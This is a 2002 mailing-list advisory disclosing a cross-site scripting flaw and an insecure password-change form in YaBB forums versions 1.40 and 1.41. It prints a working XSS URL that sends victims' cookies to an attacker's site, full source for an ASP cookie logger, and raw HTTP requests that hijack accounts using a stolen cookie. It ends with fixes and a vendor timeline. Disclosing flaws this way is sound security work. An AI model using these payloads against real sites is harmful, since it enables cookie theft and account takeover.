Next message: Martin Schulze: "[SECURITY] [DSA 179-1] New gnome-gv packages fix buffer overflow"
Two security vulnerabilities in YaBB allows stealing
users cookies and hijacking users accounts.
Tested on:
YaBB 1.40 & 1.41
Summary :
YaBB is a leading provider of free, downloadable php
forums for webmasters. Two security vulnerabilities in
the product
allows a remote attacker to steal users cookies,
hijacking users accounts, and more. The issues
discussed are :
1. Cross Site Scripting Vulnerability on the login
procedure.
2. Unsecured changing profile method.
*************** 1. Cross Site Scripting Vulnerability
on the login procedure ******************
If we log into YaBB forums and enter invalid
username/password, the forum displays the username and
the password we entered,
and it doesn't strip HTML tags from the password
field, allowing us to write malicious HTML and
JavaScript into the page.
From now on, stealing the username cookie is pretty
easy. The method for this is creating a css
vulnerability in the target
site, forcing him to send the cookie to an .asp file
we have created. This can be done by this statement :
http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD>window.locatio
n.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>
Sending the above url to someone can be suspicious to
him but we can build a site which have a invisible
frame to that url,
which is alot more dangerous.
NOTE : the yabb doesnt allow us to use "=" or "%3d",
so we have to catch the cookie without a
request("data") statement in
the asp file, because then we will need to put "data="
in the url.
Ok, now lets build the hack.asp file, to log the
cookie we are posting. The file should look like this
:
------------------------------- hack.asp
------------------------------------
<%
Option Explicit
Const ForWriting = 2
Const ForAppending = 8
Const Create = True
Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")
MyFile = Server.MapPath("./db/log.txt")
Set FSO =
Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending,
Create)
if (Str <> "") then TSO.WriteLine Str
TSO.close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
----------------------------------- EOF
-----------------------------------
This file writes
Request.ServerVariables("QUERY_STRING"), which is the
whole path we are posting after the "?", into a log
file.
************* 2. Unsecured changing profile method
***************
YaBB has a form to change users details. the original
password is not required when changing the password to
a new one,
meaning that if an attacker have someone else cookie,
he can change his password.
- Defines:
USERNAME - The username
USERNAME COOKIE- The username cookie.
- YaBB Cookie Explanation :
The cookie's format of YaBB is something like :
Cookie: YaBBusername=<USERNAME>;
YaBBpassword=ys6bPWmp44PXA;
expiretime=1034304354
After the attacker got the cookie, he can use the
cookie to change the user password. He can use the
cookie even if the
expiretime has passed by changing the cookie to the
following :
Cookie: YaBBusername=<USERNAME;
YaBBpassword=ys6bPWmp44PXA;
expiretime=9999999999
This one will always work.
- Exploiting the server and changing to a new password
:
First of all, if the attacker only want to change the
password and not the user details, he will have to get
them from the
server database and only then he will build his POST
request that will change the user's password. to do
that, he also have
to include the stolen cookie.
to find out the user details, he will send this
request to the server :
------------------------------------
GET
/forums/index.php?board=;action=profile;user=<USERNAME>
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,
application/vnd.ms-powerpoint,
application/vnd.ms-excel,
application/msword,
*/*
Accept-Language: en-us
Cookie: <USERNAME COOKIE>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0)
Host: www.victim.com
Proxy-Connection: Keep-Alive
------------------------------------
Then the server will return a form with the <USERNAME>
details, and allow attacker to change it. Note that
the form doesn't
ask the user to enter his previous password, and it
doesn't check anything but the username and his cookie
to see if it is
the legitimate user. Now attacker is ready to build
his main POST request to change the user's password
The POST request might look like this :
------------------------------------
POST /forums/index.php?board=;action=profile2 HTTP/1.1
Accept: application/vnd.ms-powerpoint,
application/vnd.ms-excel,
application/msword, image/gif, image/x-xbitmap,
image/jpeg,
image/pjpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0;
TUCOWS;
YComp 5.0.0.0)
Host: www.victim.com
Content-Length: 286
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: <USERNAME COOKIE>
userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e
mail=victimat_private&gender=&bday1=00&bday2=00&bday3=0000&location=&websi
tetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimefor
mat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
------------------------------------
All the details that the attacker set are values taken
from the form he got when he sent the GET request
first (note that
userID is a hidden value).
You can see the "passwrd1" and "passwrd2" parameters
that attacker send to the server.
After sending the above POST request, the user's
password will be changed to "HaCkEd".
*************************************************************************
- Possible Solution:
For the CSS Problem : Dont show the invalid
username/password, or at least strip HTML tags from
the password field
For the password changing problem :
1. YaBB can save the IP of each user, and check the IP
when someone asks to change his password. (Still not
unbreakable, but
much harder to exploit).
2. YaBB can ask the user to enter also the previous
password before changing it to new one. In that way
the attacker won't be
able to break the forum protection by having only the
user's cookie.
-
The security vulnerabilities were found by:
Assaf Reshef
Email: assafat_private
Nir Adar
Email: niradarat_private
Web: http://underwar.livedns.co.il
*************************************************************************
Vendor status :
10.10 First contact with the vendor, about the first
security issue.
11.10-16.10 Talking with the vendor. Vendor didnt take
this seriously
18.10 Second contact about the second security issue
18.10 Vendor didnt take this issue seriously either
__________________________________________________
Do you Yahoo!?
Faith Hill - Exclusive Performances, Videos & More
http://faith.yahoo.com
This archive was generated by hypermail 2b30
: Fri Oct 18 2002 - 12:23:13 PDT